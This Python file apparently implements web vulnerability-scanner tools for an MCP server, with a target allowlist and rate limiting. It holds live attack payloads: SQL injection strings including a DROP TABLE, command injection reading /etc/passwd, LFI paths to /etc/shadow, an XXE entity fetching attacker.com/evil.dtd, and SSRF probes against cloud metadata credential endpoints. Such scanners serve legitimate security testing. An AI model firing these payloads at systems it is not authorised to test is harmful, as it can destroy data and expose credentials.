"""
Vulnerability assessment and specific security testing tools.
"""
import asyncio
import json
import re
import base64
from typing import Any, Dict, List, Optional, Set
from urllib.parse import urlparse, parse_qs
import aiohttp
from mcp.types import Tool
from .base import BaseTools
from ..utils import validate_target, run_command_async, get_timestamp
class VulnerabilityTools(BaseTools):
"""Vulnerability assessment and security testing tools."""
def get_tools(self) -> List[Tool]:
"""Return list of vulnerability assessment tools."""
return [
Tool(
name="sql_injection_test",
description="Test for SQL injection vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"parameters": {"type": "array", "items": {"type": "string"}, "description": "Parameters to test"},
"method": {"type": "string", "enum": ["GET", "POST"], "default": "GET"},
"cookie": {"type": "string", "description": "Authentication cookie"},
"blind_test": {"type": "boolean", "default": True, "description": "Include blind SQL injection tests"}
},
"required": ["url"]
}
),
Tool(
name="xss_test",
description="Test for Cross-Site Scripting (XSS) vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"parameters": {"type": "array", "items": {"type": "string"}, "description": "Parameters to test"},
"payload_type": {"type": "string", "enum": ["reflected", "stored", "dom", "all"], "default": "all"},
"cookie": {"type": "string", "description": "Authentication cookie"}
},
"required": ["url"]
}
),
Tool(
name="command_injection_test",
description="Test for command injection vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"parameters": {"type": "array", "items": {"type": "string"}, "description": "Parameters to test"},
"os_type": {"type": "string", "enum": ["unix", "windows", "both"], "default": "both"}
},
"required": ["url"]
}
),
Tool(
name="lfi_rfi_test",
description="Test for Local and Remote File Inclusion vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"parameters": {"type": "array", "items": {"type": "string"}, "description": "Parameters to test"},
"test_type": {"type": "string", "enum": ["lfi", "rfi", "both"], "default": "both"}
},
"required": ["url"]
}
),
Tool(
name="xxe_test",
description="Test for XML External Entity (XXE) vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"xml_endpoints": {"type": "array", "items": {"type": "string"}, "description": "XML endpoints to test"}
},
"required": ["url"]
}
),
Tool(
name="ssrf_test",
description="Test for Server-Side Request Forgery (SSRF) vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"parameters": {"type": "array", "items": {"type": "string"}, "description": "Parameters to test"},
"callback_url": {"type": "string", "description": "Callback URL for out-of-band testing"}
},
"required": ["url"]
}
),
Tool(
name="idor_test",
description="Test for Insecure Direct Object Reference (IDOR) vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"id_parameters": {"type": "array", "items": {"type": "string"}, "description": "ID parameters to test"},
"test_range": {"type": "integer", "default": 100, "description": "Range of IDs to test"}
},
"required": ["url"]
}
),
Tool(
name="csrf_test",
description="Test for Cross-Site Request Forgery (CSRF) vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"forms": {"type": "array", "items": {"type": "string"}, "description": "Form URLs to test"},
"cookie": {"type": "string", "description": "Authentication cookie"}
},
"required": ["url"]
}
),
Tool(
name="authentication_bypass",
description="Test for authentication bypass vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"login_url": {"type": "string", "description": "Login endpoint URL"},
"protected_url": {"type": "string", "description": "Protected resource URL"},
"username_field": {"type": "string", "default": "username"},
"password_field": {"type": "string", "default": "password"}
},
"required": ["login_url"]
}
),
Tool(
name="privilege_escalation_test",
description="Test for privilege escalation vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"base_url": {"type": "string", "description": "Base application URL"},
"low_priv_cookie": {"type": "string", "description": "Low privilege user cookie"},
"admin_endpoints": {"type": "array", "items": {"type": "string"}, "description": "Admin endpoints to test"}
},
"required": ["base_url"]
}
),
Tool(
name="jwt_security_test",
description="Test JWT (JSON Web Token) security vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"jwt_token": {"type": "string", "description": "JWT token to analyze"},
"target_url": {"type": "string", "description": "Target URL that uses JWT"}
},
"required": ["jwt_token"]
}
),
Tool(
name="session_management_test",
description="Test session management security",
inputSchema={
"type": "object",
"properties": {
"login_url": {"type": "string", "description": "Login endpoint"},
"logout_url": {"type": "string", "description": "Logout endpoint"},
"session_cookie": {"type": "string", "description": "Session cookie name"},
"credentials": {"type": "object", "description": "Test credentials"}
},
"required": ["login_url"]
}
),
Tool(
name="race_condition_test",
description="Test for race condition vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"concurrent_requests": {"type": "integer", "default": 10, "description": "Number of concurrent requests"},
"request_data": {"type": "object", "description": "Request data to send"}
},
"required": ["url"]
}
),
Tool(
name="business_logic_test",
description="Test for business logic vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"workflow_urls": {"type": "array", "items": {"type": "string"}, "description": "Workflow URLs to test"},
"test_scenarios": {"type": "array", "items": {"type": "string"}, "description": "Business logic scenarios"}
},
"required": ["workflow_urls"]
}
),
Tool(
name="deserialization_test",
description="Test for insecure deserialization vulnerabilities",
inputSchema={
"type": "object",
"properties": {
"url": {"type": "string", "description": "Target URL"},
"serialization_type": {"type": "string", "enum": ["java", "php", "python", "dotnet", "auto"], "default": "auto"}
},
"required": ["url"]
}
)
]
async def sql_injection_test(
self,
url: str,
parameters: Optional[List[str]] = None,
method: str = "GET",
cookie: Optional[str] = None,
blind_test: bool = True
) -> str:
"""Test for SQL injection vulnerabilities."""
parsed_url = urlparse(url)
domain = parsed_url.netloc
if not self.check_target_allowed(domain):
return f"Target {domain} is not allowed for scanning"
results = {
"url": url,
"timestamp": get_timestamp(),
"method": method,
"vulnerabilities": [],
"tested_parameters": [],
"payloads_used": []
}
# SQL injection payloads
sql_payloads = [
"'", "\"", "1'", "1\"",
"' OR '1'='1", "\" OR \"1\"=\"1",
"' OR 1=1--", "\" OR 1=1--",
"'; DROP TABLE users--",
"' UNION SELECT NULL--",
"1' AND 1=1--", "1\" AND 1=1--",
"1' AND 1=2--", "1\" AND 1=2--"
]
# Time-based blind SQL injection payloads
blind_payloads = [
"1'; WAITFOR DELAY '00:00:05'--",
"1\"; WAITFOR DELAY '00:00:05'--",
"1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
"1\" AND (SELECT * FROM (SELECT(SLEEP(5)))a)--"
]
if blind_test:
sql_payloads.extend(blind_payloads)
results["payloads_used"] = sql_payloads
# Extract parameters from URL if not provided
if not parameters:
parsed = urlparse(url)
query_params = parse_qs(parsed.query)
parameters = list(query_params.keys())
if not parameters:
return "No parameters found to test"
results["tested_parameters"] = parameters
# Test each parameter with each payload
headers = {}
if cookie:
headers["Cookie"] = cookie
async with aiohttp.ClientSession() as session:
for param in parameters:
for payload in sql_payloads:
try:
await self.rate_limit()
# Prepare request
if method.upper() == "GET":
test_url = self._inject_payload_url(url, param, payload)
async with session.get(test_url, headers=headers, timeout=10) as response:
result = await self._analyze_sql_response(response, payload, param)
else:
data = {param: payload}
async with session.post(url, data=data, headers=headers, timeout=10) as response:
result = await self._analyze_sql_response(response, payload, param)
if result:
results["vulnerabilities"].append(result)
except Exception as e:
continue
return self.format_result(results, f"SQL Injection Test Results for {url}")
async def xss_test(
self,
url: str,
parameters: Optional[List[str]] = None,
payload_type: str = "all",
cookie: Optional[str] = None
) -> str:
"""Test for XSS vulnerabilities."""
parsed_url = urlparse(url)
domain = parsed_url.netloc
if not self.check_target_allowed(domain):
return f"Target {domain} is not allowed for scanning"
results = {
"url": url,
"timestamp": get_timestamp(),
"payload_type": payload_type,
"vulnerabilities": [],
"tested_parameters": [],
"payloads_used": []
}
# XSS payloads by type
xss_payloads = {
"reflected": [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"javascript:alert('XSS')",
"\"><script>alert('XSS')</script>",
"'><script>alert('XSS')</script>"
],
"stored": [
"<script>alert('Stored XSS')</script>",
"<img src=x onerror=alert('Stored XSS')>",
"<iframe src=javascript:alert('Stored XSS')>",
"<body onload=alert('Stored XSS')>"
],
"dom": [
"#<script>alert('DOM XSS')</script>",
"javascript:alert('DOM XSS')",
"data:text/html,<script>alert('DOM XSS')</script>"
]
}
# Select payloads based on type
if payload_type == "all":
payloads = []
for payload_list in xss_payloads.values():
payloads.extend(payload_list)
else:
payloads = xss_payloads.get(payload_type, [])
results["payloads_used"] = payloads
# Extract parameters if not provided
if not parameters:
parsed = urlparse(url)
query_params = parse_qs(parsed.query)
parameters = list(query_params.keys())
if not parameters:
return "No parameters found to test"
results["tested_parameters"] = parameters
headers = {}
if cookie:
headers["Cookie"] = cookie
async with aiohttp.ClientSession() as session:
for param in parameters:
for payload in payloads:
try:
await self.rate_limit()
test_url = self._inject_payload_url(url, param, payload)
async with session.get(test_url, headers=headers, timeout=10) as response:
content = await response.text()
# Check if payload is reflected in response
if payload in content:
vulnerability = {
"type": "XSS",
"parameter": param,
"payload": payload,
"method": "GET",
"evidence": f"Payload reflected in response"
}
results["vulnerabilities"].append(vulnerability)
except Exception:
continue
return self.format_result(results, f"XSS Test Results for {url}")
async def command_injection_test(
self,
url: str,
parameters: Optional[List[str]] = None,
os_type: str = "both"
) -> str:
"""Test for command injection vulnerabilities."""
parsed_url = urlparse(url)
domain = parsed_url.netloc
if not self.check_target_allowed(domain):
return f"Target {domain} is not allowed for scanning"
results = {
"url": url,
"timestamp": get_timestamp(),
"os_type": os_type,
"vulnerabilities": [],
"tested_parameters": [],
"payloads_used": []
}
# Command injection payloads
unix_payloads = [
"; ls", "| ls", "& ls", "`ls`", "$(ls)",
"; cat /etc/passwd", "| cat /etc/passwd",
"; sleep 5", "| sleep 5", "`sleep 5`",
"; whoami", "| whoami", "`whoami`"
]
windows_payloads = [
"& dir", "| dir", "&& dir",
"& type C:\\windows\\system32\\drivers\\etc\\hosts",
"| type C:\\windows\\system32\\drivers\\etc\\hosts",
"& ping -n 5 127.0.0.1",
"| ping -n 5 127.0.0.1"
]
if os_type == "unix":
payloads = unix_payloads
elif os_type == "windows":
payloads = windows_payloads
else: # both
payloads = unix_payloads + windows_payloads
results["payloads_used"] = payloads
# Extract parameters if not provided
if not parameters:
parsed = urlparse(url)
query_params = parse_qs(parsed.query)
parameters = list(query_params.keys())
if not parameters:
return "No parameters found to test"
results["tested_parameters"] = parameters
async with aiohttp.ClientSession() as session:
for param in parameters:
for payload in payloads:
try:
await self.rate_limit()
test_url = self._inject_payload_url(url, param, payload)
start_time = asyncio.get_event_loop().time()
async with session.get(test_url, timeout=15) as response:
end_time = asyncio.get_event_loop().time()
response_time = end_time - start_time
content = await response.text()
# Check for command injection indicators
if self._detect_command_injection(content, payload, response_time):
vulnerability = {
"type": "Command Injection",
"parameter": param,
"payload": payload,
"response_time": response_time,
"evidence": "Command injection detected"
}
results["vulnerabilities"].append(vulnerability)
except Exception:
continue
return self.format_result(results, f"Command Injection Test Results for {url}")
async def lfi_rfi_test(
self,
url: str,
parameters: Optional[List[str]] = None,
test_type: str = "both"
) -> str:
"""Test for Local and Remote File Inclusion vulnerabilities."""
parsed_url = urlparse(url)
domain = parsed_url.netloc
if not self.check_target_allowed(domain):
return f"Target {domain} is not allowed for scanning"
results = {
"url": url,
"timestamp": get_timestamp(),
"test_type": test_type,
"vulnerabilities": [],
"tested_parameters": [],
"payloads_used": []
}
# LFI payloads
lfi_payloads = [
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
"/etc/passwd",
"C:\\windows\\system32\\drivers\\etc\\hosts",
"../../../etc/shadow",
"../../../proc/version",
"../../../etc/hostname"
]
# RFI payloads (use carefully)
rfi_payloads = [
"http://example.com/malicious.txt",
"https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt"
]
if test_type == "lfi":
payloads = lfi_payloads
elif test_type == "rfi":
payloads = rfi_payloads
else: # both
payloads = lfi_payloads + rfi_payloads
results["payloads_used"] = payloads
# Extract parameters if not provided
if not parameters:
parsed = urlparse(url)
query_params = parse_qs(parsed.query)
parameters = list(query_params.keys())
if not parameters:
return "No parameters found to test"
results["tested_parameters"] = parameters
async with aiohttp.ClientSession() as session:
for param in parameters:
for payload in payloads:
try:
await self.rate_limit()
test_url = self._inject_payload_url(url, param, payload)
async with session.get(test_url, timeout=10) as response:
content = await response.text()
# Check for file inclusion indicators
if self._detect_file_inclusion(content, payload):
vulnerability = {
"type": "LFI" if payload in lfi_payloads else "RFI",
"parameter": param,
"payload": payload,
"evidence": "File inclusion detected"
}
results["vulnerabilities"].append(vulnerability)
except Exception:
continue
return self.format_result(results, f"File Inclusion Test Results for {url}")
async def xxe_test(
self,
url: str,
xml_endpoints: Optional[List[str]] = None
) -> str:
"""Test for XXE vulnerabilities."""
parsed_url = urlparse(url)
domain = parsed_url.netloc
if not self.check_target_allowed(domain):
return f"Target {domain} is not allowed for scanning"
results = {
"url": url,
"timestamp": get_timestamp(),
"vulnerabilities": [],
"tested_endpoints": [],
"payloads_used": []
}
# XXE payloads
xxe_payloads = [
"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>""",
"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">]>
<root>&xxe;</root>""",
"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd"> %ext;]>
<root></root>""",
"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>
<root>&xxe;</root>"""
]
results["payloads_used"] = xxe_payloads
# Use provided endpoints or default to base URL
if not xml_endpoints:
xml_endpoints = [url]
results["tested_endpoints"] = xml_endpoints
headers = {"Content-Type": "application/xml"}
async with aiohttp.ClientSession() as session:
for endpoint in xml_endpoints:
for payload in xxe_payloads:
try:
await self.rate_limit()
async with session.post(endpoint, data=payload, headers=headers, timeout=10) as response:
content = await response.text()
# Check for XXE indicators
if self._detect_xxe(content):
vulnerability = {
"type": "XXE",
"endpoint": endpoint,
"payload": payload[:100] + "...",
"evidence": "XXE vulnerability detected"
}
results["vulnerabilities"].append(vulnerability)
except Exception:
continue
return self.format_result(results, f"XXE Test Results for {url}")
async def ssrf_test(
self,
url: str,
parameters: Optional[List[str]] = None,
callback_url: Optional[str] = None
) -> str:
"""Test for SSRF vulnerabilities."""
parsed_url = urlparse(url)
domain = parsed_url.netloc
if not self.check_target_allowed(domain):
return f"Target {domain} is not allowed for scanning"
results = {
"url": url,
"timestamp": get_timestamp(),
"vulnerabilities": [],
"tested_parameters": [],
"payloads_used": []
}
# SSRF payloads
ssrf_payloads = [
"http://127.0.0.1:80",
"http://localhost:80",
"http://169.254.169.254/", # AWS metadata
"http://169.254.169.254/latest/meta-data/",
"file:///etc/passwd",
"gopher://127.0.0.1:3306/",
"dict://127.0.0.1:6379/"
]
if callback_url:
ssrf_payloads.append(callback_url)
results["payloads_used"] = ssrf_payloads
# Extract parameters if not provided
if not parameters:
parsed = urlparse(url)
query_params = parse_qs(parsed.query)
parameters = list(query_params.keys())
if not parameters:
return "No parameters found to test"
results["tested_parameters"] = parameters
async with aiohttp.ClientSession() as session:
for param in parameters:
for payload in ssrf_payloads:
try:
await self.rate_limit()
test_url = self._inject_payload_url(url, param, payload)
start_time = asyncio.get_event_loop().time()
async with session.get(test_url, timeout=15) as response:
end_time = asyncio.get_event_loop().time()
response_time = end_time - start_time
content = await response.text()
# Check for SSRF indicators
if self._detect_ssrf(content, payload, response_time):
vulnerability = {
"type": "SSRF",
"parameter": param,
"payload": payload,
"response_time": response_time,
"evidence": "SSRF vulnerability detected"
}
results["vulnerabilities"].append(vulnerability)
except Exception:
continue
return self.format_result(results, f"SSRF Test Results for {url}")
async def jwt_security_test(
self,
jwt_token: str,
target_url: Optional[str] = None
) -> str:
"""Test JWT security vulnerabilities."""
results = {
"jwt_token": jwt_token[:20] + "...",
"timestamp": get_timestamp(),
"vulnerabilities": [],
"token_analysis": {}
}
try:
# Decode JWT without verification
import jwt as jwt_lib
# Split JWT
parts = jwt_token.split('.')
if len(parts) != 3:
return "Invalid JWT token format"
header = json.loads(base64.urlsafe_b64decode(parts[0] + '=='))
payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
results["token_analysis"] = {
"header": header,
"payload": payload,
"algorithm": header.get("alg"),
"token_type": header.get("typ")
}
# Test for common JWT vulnerabilities
vulnerabilities = []
# 1. None algorithm attack
if header.get("alg") == "none":
vulnerabilities.append({
"type": "None Algorithm",
"description": "JWT uses 'none' algorithm, allowing unsigned tokens",
"severity": "High"
})
# 2. Weak secret (if HMAC)
if header.get("alg", "").startswith("HS"):
weak_secrets = ["secret", "password", "123456", "admin", "test"]
for secret in weak_secrets:
try:
jwt_lib.decode(jwt_token, secret, algorithms=["HS256"])
vulnerabilities.append({
"type": "Weak Secret",
"description": f"JWT can be decoded with weak secret: {secret}",
"severity": "Critical"
})
break
except:
continue
# 3. Algorithm confusion (RS256 to HS256)
if header.get("alg") == "RS256":
vulnerabilities.append({
"type": "Algorithm Confusion",
"description": "RS256 token might be vulnerable to HS256 confusion attack",
"severity": "Medium"
})
# 4. Expired token
if "exp" in payload:
import time
if payload["exp"] < time.time():
vulnerabilities.append({
"type": "Expired Token",
"description": "JWT token has expired",
"severity": "Low"
})
# 5. Missing expiration
if "exp" not in payload:
vulnerabilities.append({
"type": "No Expiration",
"description": "JWT token has no expiration claim",
"severity": "Medium"
})
results["vulnerabilities"] = vulnerabilities
except Exception as e:
results["error"] = f"Failed to analyze JWT: {str(e)}"
return self.format_result(results, "JWT Security Analysis")
# Helper methods
def _inject_payload_url(self, url: str, param: str, payload: str) -> str:
"""Inject payload into URL parameter."""
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
parsed = urlparse(url)
query_params = parse_qs(parsed.query)
query_params[param] = [payload]
new_query = urlencode(query_params, doseq=True)
return urlunparse((
parsed.scheme, parsed.netloc, parsed.path,
parsed.params, new_query, parsed.fragment
))
async def _analyze_sql_response(self, response, payload: str, param: str) -> Optional[Dict[str, Any]]:
"""Analyze response for SQL injection indicators."""
content = await response.text()
# SQL error patterns
sql_errors = [
"sql syntax", "mysql_fetch", "ora-", "postgresql",
"sqlite_", "sqlserver", "syntax error", "quoted string",
"mysql_num_rows", "mysql_result", "pg_query",
"sqlite3.OperationalError", "ORA-00933"
]
for error in sql_errors:
if error.lower() in content.lower():
return {
"type": "SQL Injection",
"parameter": param,
"payload": payload,
"method": "Error-based",
"evidence": f"SQL error found: {error}"
}
# Time-based detection
if "sleep" in payload.lower() or "waitfor" in payload.lower():
# This would need proper timing analysis
pass
return None
def _detect_command_injection(self, content: str, payload: str, response_time: float) -> bool:
"""Detect command injection indicators."""
# Command output patterns
command_patterns = [
"root:", "bin/", "/usr/", "windows", "system32",
"passwd", "shadow", "hosts", "config"
]
for pattern in command_patterns:
if pattern in content.lower():
return True
# Time-based detection
if "sleep" in payload.lower() and response_time > 4:
return True
return False
def _detect_file_inclusion(self, content: str, payload: str) -> bool:
"""Detect file inclusion indicators."""
file_patterns = [
"root:x:", "daemon:", "www-data:", "nobody:",
"[boot loader]", "[operating systems]",
"# This file", "127.0.0.1", "localhost"
]
for pattern in file_patterns:
if pattern in content:
return True
return False
def _detect_xxe(self, content: str) -> bool:
"""Detect XXE vulnerability indicators."""
xxe_patterns = [
"root:x:", "daemon:", "www-data:",
"127.0.0.1", "localhost",
"file:///", "php://filter"
]
for pattern in xxe_patterns:
if pattern in content:
return True
return False
def _detect_ssrf(self, content: str, payload: str, response_time: float) -> bool:
"""Detect SSRF vulnerability indicators."""
# AWS metadata indicators
if "169.254.169.254" in payload:
aws_patterns = [
"ami-id", "instance-id", "security-groups",
"iam/security-credentials"
]
for pattern in aws_patterns:
if pattern in content:
return True
# Local service indicators
local_patterns = [
"apache", "nginx", "mysql", "redis",
"mongodb", "elasticsearch"
]
for pattern in local_patterns:
if pattern.lower() in content.lower():
return True
return False